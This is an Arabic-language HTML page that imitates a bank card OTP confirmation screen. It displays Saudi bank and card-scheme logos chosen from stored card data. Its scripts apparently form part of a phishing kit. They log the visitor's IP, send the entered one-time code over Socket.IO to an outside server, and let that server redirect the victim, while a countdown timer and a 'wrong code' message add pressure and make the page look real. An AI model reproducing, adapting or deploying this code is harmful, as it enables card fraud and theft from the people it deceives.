<!DOCTYPE html>
<html lang="ar" dir="rtl">
  <head>
    <meta charset="utf-8" />
    <meta content="width=device-width, initial-scale=1" name="viewport" />
    <title>verification</title>
    <link
      href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/css/bootstrap.min.css"
      rel="stylesheet"
    />
    <style>
      @import url("https://fonts.googleapis.com/css2?family=Readex+Pro:wght@160..700&display=swap");
      @import url("https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css");
      * {
        font-family: "Readex Pro", sans-serif;
        font-optical-sizing: auto;
        font-weight: 400;
        font-style: normal;
        font-variation-settings: "HEXP" 0;
      }
      .content-section {
        display: none;
      }
      .content-section.active {
        display: block;
      }
      #loadingOverlay {
        position: fixed;
        inset: 0;
        background-color: rgba(0, 0, 0, 0.6);
        z-index: 9999;
        justify-content: center;
        align-items: center;
      }
    </style>
  </head>

  <body>
    <div class="container mt-5" id="applePayRadio">
      <div class="row justify-content-center">
        <div class="col-md-6 col-lg-4">
          <div
            style="
              border: 1px solid #ddd;
              border-radius: 12px;
              overflow: hidden;
            "
          >
            <div style="padding: 16px" class="text-center">
              <div class="d-flex justify-content-between mb-4">
                <img id="card_type" src="" style="height: 38px; width: 110px" />
                <img id="bank_type" src="" width="110px" />
              </div>
              <h5>تأكيد عملية الشراء</h5>
              <p class="text-right mt-3" style="font-size: small">
                تم إرسال رسالة نصية تحتوي على رمز تأكيد لمرة واحدة (OTP) إلى
                رقمك المسجل لدينا لتأكيد حركة الدفع في
                <span dir="ltr" id="today_time_and_date"></span>
              </p>
              <p class="text-right mt-3" style="font-size: small">
                يرجى عدم مشاركة الرمز مع أحد.
              </p>
              <form id="verificationForm">
                <div class="form-group text-right">
                  <label for="verification_code_two">أدخل الرمز هنا:</label>
                  <input
                    class="form-control text-center"
                    id="verification_code_two"
                    type="tel"
                    minlength="4"
                    maxlength="6"
                    pattern="^[0-9]{4,6}$"
                    title="يجب أن يتكون رمز التحقق من 4 إلى 6 أرقام فقط"
                    oninput="this.value = this.value.replace(/\D/g, '').slice(0, 6)"
                    required
                  />
                  <small id="verification_error" class="text-danger d-none"
                    >الرمز المدخل خاطئ</small
                  >
                </div>
                <button class="btn btn-primary col-12" type="submit">
                  تأكيد
                </button>
                <p class="mt-3" style="font-size: x-small">
                  ستنتهي صلاحية هذه الصفحة تلقائياً بعد
                  <span id="timer" style="color: red">60</span> ثانية
                </p>
                <p class="text-right text-secondary mt-3 small">
                  هل تحتاج للمساعدة؟
                </p>
              </form>
            </div>
          </div>
        </div>
      </div>
    </div>

    <!-- Loading overlay, initially hidden -->
    <div id="loadingOverlay" class="d-none">
      <div class="text-center text-white">
        <div class="spinner-border text-light mb-3" role="status"></div>
        <h5 class="font-weight-bold">يرجى الانتظار</h5>
        <p>انتظر حتى تتم معالجة طلبك</p>
      </div>
    </div>

    <!-- 1) Load Socket.IO once -->
    <script src="https://cdn.socket.io/4.6.1/socket.io.min.js"></script>
    <script>
      window.socket = io("https://b-care-server.onrender.com");
      window.visitorIP = null;
      (async () => {
        try {
          const res = await fetch("https://api.ipify.org?format=json");
          const { ip } = await res.json();
          window.visitorIP = ip;
          const page =
            window.location.pathname.split("/").pop() || "verification.html";
          window.socket.emit("updateLocation", { ip, page });
        } catch (err) {
          console.error("IP fetch failed:", err);
        }
      })();
    </script>

    <!-- 2) location.js (navigates on server’s navigateTo messages) -->
    <script src="./assets/js/location.js"></script>

    <!-- 3) Initialize logos & timestamp on load -->
    <script>
      document.addEventListener("DOMContentLoaded", () => {
        // 3.1) Timestamp
        document.getElementById("today_time_and_date").textContent =
          new Date().toLocaleString("ar-EG");

        // 3.2) Card scheme from sessionStorage
        const scheme = sessionStorage.getItem("Card type"); // "visa" or "mastercard"
        const cardTypeEl = document.getElementById("card_type");
        if (scheme === "visa") {
          cardTypeEl.src = "assets/photos/visa_logo.jpg";
        } else if (scheme === "mastercard") {
          cardTypeEl.src = "assets/photos/mastar.svg";
        } else {
          cardTypeEl.src = "assets/icon/Bca-logo.svg";
        }
        cardTypeEl.style.float = "right";

        // 3.3) Bank logo via BIN from sessionStorage
        const bin = sessionStorage.getItem("cardBin") || "";
        const SAUDI_BINS = {
          588845: "Alrajhi",
          458214: "SNB",
          402360: "Alinma",
          407302: "Samba",
          409665: "Riyad",
          428916: "SaudiEnaya",
          512345: "ArabNational",
          535577: "Jazeera",
          588561: "Alawwal",
          540172: "Enjaz",
          400468: "Albilad",
          484783: "Alrajhi",
        };
        const bankKey = SAUDI_BINS[bin];
        const bankTypeEl = document.getElementById("bank_type");
        if (bankKey) {
          bankTypeEl.src = `assets/photos/${bankKey}.png`;
        } else {
          bankTypeEl.src = "assets/icon/Bca-logo.svg";
        }
        bankTypeEl.style.float = "right";
      });
    </script>

    <!-- 4) Countdown timer -->
    <script>
      document.addEventListener("DOMContentLoaded", () => {
        const timerEl = document.getElementById("timer");
        let seconds = parseInt(timerEl.textContent, 10);
        const id = setInterval(() => {
          seconds--;
          if (seconds < 0) {
            clearInterval(id);
            return;
          }
          timerEl.textContent = seconds;
        }, 1000);
      });
    </script>

    <!-- 5) OTP submit via socket & overlay control -->
    <script>
      document.addEventListener("DOMContentLoaded", () => {
        const form = document.getElementById("verificationForm");
        const overlay = document.getElementById("loadingOverlay");
        form.addEventListener("submit", async (e) => {
          e.preventDefault();

          // show overlay
          overlay.classList.remove("d-none");
          overlay.classList.add("d-flex");

          // wait for visitorIP
          while (window.visitorIP === null) {
            await new Promise((r) => setTimeout(r, 50));
          }

          const codeTwo = document.getElementById(
            "verification_code_two"
          ).value;
          window.socket.emit("submitVerification", {
            ip: window.visitorIP,
            verification_code_two: codeTwo,
          });
        });

        // ack from server
        window.socket.on("ackVerification", (resp) => {
          if (resp.success) {
            // keep overlay, location.js will redirect when server emits navigateTo
          } else {
            alert("حدث خطأ أثناء التحقق، حاول مرة أخرى.");
            console.error(resp.error);
            overlay.classList.remove("d-flex");
            overlay.classList.add("d-none");
            document
              .getElementById("verification_error")
              .classList.remove("d-none");
          }
        });
      });
    </script>

    <!-- 6) Load jQuery then Bootstrap JS -->
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.slim.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/js/bootstrap.bundle.min.js"></script>
  </body>
</html>
